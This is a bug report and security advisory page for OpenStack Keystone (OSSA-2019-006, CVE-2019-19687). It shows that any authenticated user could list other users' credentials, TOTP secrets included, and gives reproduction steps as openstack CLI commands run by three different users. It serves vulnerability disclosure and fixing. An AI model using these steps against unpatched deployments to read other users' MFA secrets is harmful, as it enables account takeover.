[OSSA-2019-006] Credentials API allows listing and retrieving of all users credentials (CVE-2019-19687)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Identity (keystone) |
Fix Released
|
Critical
|
Colleen Murphy | ||
OpenStack Security Advisory |
Fix Released
|
High
|
Gage Hugo | ||
keystone (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Tested against Stein and Train.
# User creating a credential, i.e totp or similar
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b7
| user_id | 9971b0f13d2d4a5
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a5
$ OS_CLOUD=1 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
# Different User but same Project
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b7
| user_id | 6b28a0b073fc4ac
$ OS_CLOUD=2 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
# Different User and Different Project
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f3
| user_id | 2e48f1a7d147439
$ OS_CLOUD=3 openstack credential list
+------
| ID | Type | User ID | Data | Project ID |
+------
| 0a3a2d3b7dad488
+------
As shown anyone who's authenticated can retrieve any credentials including their 'secret'.
This is a rather severe information disclosure vulnerability and completely defies the purpose of TOTP or MFA as these credentials are not kept secure or private whatsoever.
If Auth-rules are configured allow login with only 'topt' it would be extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu:
$ dpkg -l | grep keystone
ii keystone 2:16.0.
ii keystone-common 2:16.0.
ii python-
ii python-
ii python-
ii python3-keystone 2:16.0.
ii python3-
ii python3-
ii python3-
Stein/RHEL:
$ rpm -qa | grep keystone
python3-
openstack-
python3-
python3-
python3-
CVE References
Changed in keystone: | |
status: | New → Confirmed |
importance: | Undecided → Critical |
information type: | Private Security → Public Security |
summary: |
- Credentials API allows listing and retrieving of all user's credentials + Credentials API allows listing and retrieving of all users' credentials |
summary: |
- Credentials API allows listing and retrieving of all users credentials + [OSSA-2019-006] Credentials API allows listing and retrieving of all + users credentials (CVE-2019-19687) |
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.